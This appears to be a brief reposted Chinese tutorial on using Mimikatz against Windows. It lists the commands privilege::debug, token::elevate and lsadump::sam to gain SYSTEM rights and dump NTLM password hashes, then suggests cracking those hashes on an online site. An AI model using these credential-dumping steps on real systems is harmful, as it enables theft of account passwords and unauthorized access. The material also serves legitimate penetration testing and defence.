Mimikatz是法国人benjamin开发的一款功能强大的轻量级调试工具,本意是用来个人测试,但由于其功能强大,能够直接读取WindowsXP-2012等操作系统的明文密码而闻名于渗透测试。
代码块显示效果
privilege::debug请注意,执行以下命令需要管理员权限,确保您具备足够的权限来安全地执行此操作
提升权限为system
token::elevate
获取到NTLM的hash
lsadump::sam
获取的hash,放到https://www.cmd5.com/进行解密
项目地址:
https://github.com/gentilkiwi/mimikatz
文章转自小白安全工具
原文始发于微信公众号(昊天信安):一个玩转Windows安全的小工具
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论